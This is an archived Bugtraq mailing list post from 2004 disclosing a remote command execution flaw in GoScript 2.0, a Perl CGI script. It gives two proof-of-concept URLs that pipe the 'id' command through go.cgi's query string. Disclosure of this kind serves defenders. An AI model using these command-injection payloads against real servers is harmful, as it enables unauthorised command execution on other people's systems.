Bugtraq mailing list archives

GoScript Remote Command Execution


From: Francisco Alisson <dominusvis () click21 com br>
Date: 4 Aug 2004 04:28:11 -0000



GoScript Remote Command Execution

Version verified: 2.0
Author: Pete Stein http://www.slack.net/~pete/perl

GoScript v2.0 allow remote commando execution as we can see below:

http://www.server.com/go.cgi?|id|
http://www.server.com/go.cgi?artarchive=|id|

May be possible another methods of attack!

Thanks :)

[Infektion Group]
irc.phey.net 6667 -j #infektion
<Dominus_Vis>


Current thread: